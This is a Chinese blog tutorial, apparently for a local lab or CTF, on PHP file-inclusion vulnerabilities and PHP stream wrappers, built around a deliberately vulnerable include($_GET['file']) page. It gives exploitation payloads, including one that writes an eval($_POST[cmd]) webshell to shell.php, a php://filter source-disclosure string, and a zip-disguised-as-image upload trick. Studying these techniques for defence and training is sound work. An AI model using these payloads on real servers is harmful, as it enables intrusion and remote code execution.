文件包含与PHP伪协议实战演练

最新推荐文章于 2024-05-14 21:12:14 发布
最新推荐文章于 2024-05-14 21:12:14 发布
阅读量536 收藏 6
点赞数 1
分类专栏: 基础漏洞学习 文章标签: 信息安全 安全漏洞 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43277152/article/details/113309645
版权

目录

一、PHP中造成文件包含的四个函数

1、include() 、require()
当使用include()函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。

当使用require()函数包含文件时,只要程序一执行就会立即调用文件,发生错误的时候会输出错误信息,并且终止脚本的运行

2、include_once() 功能和 include() 相同,区别在于当重复调用同一文件时,程序只调用一次。
require_once()功能和require()相同,区别在于当重复调用同一文件时,程序只调用一次。

当使用上述四个函数包含一个新文件时,该文件将作为 PHP 代码执行,php 内核并不在意该被包含的文件是什么类型。所以如果被包含的是 txt 文件、图片文件、远程 url、也都将作为 PHP 代码执行。

robots.txt 内容为:<?php phpinfo();?>
路径为:E:\phpStudy\WWW\robots.txt

在这里插入图片描述

二、本地文件包含、远程文件包含的区别

1、本地文件包含 LFI(Local File Include)
2、远程文件包含 RFI(Remote File Include)(需要 php.ini 中 allow_url_include=on、allow_url_fopen = On)

在 php.ini 中,allow_url_fopen 默认一直是 On,而 allow_url_include 从 php5.2 之后就默认为 Off。

在这里插入图片描述

三、PHP伪协议

PHP伪协议事实上就是支持的协议与封装协议(12种)

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

测试代码

路径为:E:\phpStudy\WWW\include.php

<?php
include($_GET[‘file‘])
?>

目标文件

robots.txt
路径为:E:\phpStudy\WWW\robots.txt

<?php phpinfo();?>

robots.zip
路径为:E:\phpStudy\WWW\robots.zip
内容为:robots.txt

1.php
路径为:E:\phpStudy\WWW\1.php

<?php echo('hello word!');?>

flag.txt
路径为:E:\flag.txt

flag{test123}

常用协议

1、目录遍历获取flag

在这里插入图片描述

2、php://input、php://filter

在CTF中经常使用的是php://filter和php://input
(1)php://input用于执行php代码。

PHP.ini:
allow_url_fopen :off/on
allow_url_include:on

在这里插入图片描述
也可以写入shell获取服务器权限

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

在这里插入图片描述
接下来就是连接后门就OK了

(2)php://filter用于读取源码
php://filter在双off的情况下也可以正常使用;
allow_url_fopen :off/on
allow_url_include:off/on
?file=php://filter/convert.base64-encode/resource=1.php

在这里插入图片描述
获取到的内容是base64加密的,解码即可获取1.php源码

3、file://

用于访问本地文件系统,在CTF中通常用来读取本地文件

file:// 协议在双off的情况下也可以正常使用;
allow_url_fopen :off/on
allow_url_include:off/on
在这里插入图片描述
需要获取文件绝对路径

4、data://

allow_url_fopen:on
allow_url_include:on
在这里插入图片描述
可以写入后门,获取权限执行任意命令
在这里插入图片描述

5、zip://

zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]

先将要执行的PHP代码写好文件名为robots.txt,将robots.txt进行zip压缩,压缩文件名为rob.zip,如果可以上传zip文件便直接上传,若不能便将rob.zip重命名为rob.jpg后在上传.

由于#在get请求中会将后面的参数忽略所以使用get请求时候应进行url编码为%23,且此处经过测试相对路径是不可行,所以只能用绝对路径。
在这里插入图片描述

墨子辰
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB常见漏洞之文件包含(基础原理篇)
One-Fox安全团队的博客
07-01 284
使用方法主要适用于在服务端代码里已写死后缀名(.txt),如只能传入文件名(1),当传入完整文件名(1.txt)时会发生错误,00截断就能帮助绕过这类限制完成getshell上传带有木马的图片文件包含通过00截断访问目标图片,如 test.php?使用蚁剑连接目标0x02 超长文件截断php < 5.2 .8 文件名要求:linux文件名需长于 4096 winodws文件名需长于 256。
FPGA设计实战演练(高级技巧篇)
11-16
一生中有幸成为新发现或新思想的一部分的机会屈指可数。某些思想或革新会极大地改变我们所生活的 世界。想一想如果生物科学家完成了整个人类基因的绘制 — 确定了DNA结构的最后一个基因,美国国 ...
WEB安全-文件包含
qq_59350385的博客
03-01 3116
一、文件包含的定义 如果说使用文件包含的路径是攻击者可控的话,此时,我们可以通过控制参数变量从而能包含本不在开发者意愿之内的文件。 本地文件包含包含服务器端的文件 远程文件包含包含远程url的文件 (allow_url_fopen allow_url_include) 可以用什么去截断:? #(%23) 二、文件包含的利用 1.配合文件上传漏洞执行getshell 2.包含日志getshell ...
Web安全——文件包含漏洞
qq_44915227的博客
04-22 1055
文件包含漏洞是“代码注入”的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。“代码注入”的典型代表就是文件包含文件包含漏洞可能出现在JSP、PHP、ASP等语言中,原理都是一样的。在PHP中,有四个用于包含文件的函数,当使用这些函数包含文件时,文件包含PHP代码会被执行。本地文件包含LFI(Local File Inclusion)当被包含文件在服务器本地时,就形成本地文件包含
文件包含时涉及PHP协议总结
最新发布
qq_43256965的博客
05-14 1023
在做CTF题的时候文件包含题出现多次使用协议,学习了下协议就顺便写个博客防止以后忘记PHP协议总结温故而知新,宁静以致远。
南邮杯CTF 文件包含漏洞实战
永远是少年
12-14 844
今天继续给大家介绍CTF刷题,本文主要内容是南邮杯CTF 文件包含漏洞实战。 一、题目简介 二、解题思路 三、解题实战
企业办公自动化系统,java,代码源文件,毕设,实战,真实项目
12-07
企业办公自动化系统是一套基于Java开发的真实项目源代码,专注于实现企业内部各项办公流程的自动化和数字化。该系统采用先进的Java技术,结合实际需求,打造了一个功能齐全、性能稳定的企业办公平台。 这份源码涵盖了企业办公的核心业务功能,如流程审批、文档管理、通讯录、日程安排等,可以满足企业在日常办公中的多种需求。代码结构清晰,逻辑严谨,融入了多种设计模式和最佳实践,展现了高质量的编码风格和系统架构设计。 通过学习和研究这份源码,Java开发者和学生可以提升对企业级应用开发的认知和技能水平。源码中包含了丰富的注释和文档,有助于理解系统的实现细节和业务流程。此外,它还可以作为毕业设计和实战项目的参考,提供宝贵的实践经验。 该源码具有很高的实用价值,企业可以根据自身需求进行定制和扩展,实现特定业务场景的自动化办公。同时,它也可以作为教学材料,用于教授Java企业级开发或软件工程相关课程,帮助学生更好地掌握实际项目开发的知识和技能。 总之,这份企业办公自动化系统的Java代码源文件是一份宝贵的资源,它提供了一个真实项目的参考实现,展现了企业级应用的开发标准和最佳实践。无论你是Java开发
文件包含漏洞+php协议
unexpectedthing的博客
11-11 6420
文章目录常见的文件包含函数基本绕过:利用php协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
Web文件包含
q
05-12 951
包含文件被当作当前的语言去代码执行漏洞原因:1.使用文件包含函数2.包含文件可控分类:1.本地包含:​ 有文件利用:配合文件上传​ 无文件利用:​ 1.包含日志文件​ 2.包含session文件​ 3.协议利用2.远程包含:公网服务器自定义文件差异:代码过滤, allow_url_include配置开关白盒发现:包含函数黑盒发现:主要观察参数传递的数据和文件名是否对应。
嵌入式网络那些事:LwIP协议深度剖析与实战演练.PDF
05-02
《嵌入式网络那些事:LwIP协议深度剖析与实战演练》面向网络TCP/IP协议初学者以及大量嵌入式网络开发人员,从当下流行的嵌入式网络协议栈LwIP的源代码入手,详细讲解TCP/IP协议的各层机制及其实现原理。同时,通过...
嵌入式网络那些事——LwIP协议深度剖析与实战演练
03-25
嵌入式网络那些事——LwIP协议深度剖析与实战演练.pdf (2012年版)
嵌入式网络那些事LwIP协议深度剖析与实战演练
11-24
嵌入式网络那些事LwIP协议深度剖析与实战演练
C#与.NET技术平台实战演练
12-02
C#与.NET技术平台实战演练
web攻防——文件包含
2303_79592445的博客
02-29 652
但是浏览器先会自动帮你解码,然后php又会被识别出来,然后,urldecode又会再次进行解码,进行两次解码这样还是会过滤。然后通过post传参将后门写入(注意要记得将这个后门代码编码,因为看上面它这个协议后门是将他解码的)首先我们先查看中间件,发现是nginx,于是我们就去网上搜索nginx的日志记录文件的地址。然后通过协议,进行包含,那么当include看到这个base64就会自动解码。然后这个后门代码就会被写入session文件之中,然后再进行包含就可以了。
[LFI]Phpinfo本地文件包含漏洞环境搭建分析
weixin_34380948的博客
08-29 469
0x00 本地文件包含漏洞即网站未对用户可控变量进行控制,导致用户可以控制包含变量。 0x01 参考wooyun上的教程中遇到问题如下: Can not connect to the docker deamon 权限不够,docker未提示,指令前加sudo sudo docker run –rm -p “8901:80” janes/lfi_phpinfo 8901为本机端口...
配合php协议利用文件包含漏洞
超人学飞的日子
06-06 9197
php支持多种封装协议,这些协议常被CTF出题中与文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy中的设置为5.4.45版本,设置allow_url_fopen和allow_url_include都为On.index.phpindex.php同级目录下有mytest001.txt ,mytest002.txt ,mytest003.zip(其中包含mytest...
php源码之遍历目录下的所有的文件
weixin_34295316的博客
10-28 61
<?php //遍历目录下的所有的文件 -- 递归调用 // http://www.manongjc.com/article/1495.html function get_all_file1($path){ if($path != '.' && $path != '..' && is_dir($path)){ //判断是否是目录,并...
Web漏洞之文件包含漏洞
zkaqlaoniao的博客
10-28 6905
公众号:黑客菌 分享更多技术文章,欢迎关注一起探讨学习 一、文件包含漏洞概述 1、漏洞介绍 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚.
File Inclusion(文件包含漏洞)学习 / 协议
Goodric的博客
01-25 2258
file inclusion(文件包含漏洞) 在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 通过文件包含函数将文件包含进来,直接使用包含文件中的代码。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但有些时候,使用函数包含文件时,被包含文件就设置为了函数的变量。 通过动态变量来引入需要包含文件时,用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞。 通常文件包含
国家开放大学 网络操作系统管理 形考任务3 磁盘存储与文件服务实训
04-02
国家开放大学 网络操作系统管理 形考任务3 磁盘存储与文件服务实训。介绍了基本磁盘和动态磁盘、卷管理方法,重复数据删除的配置等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值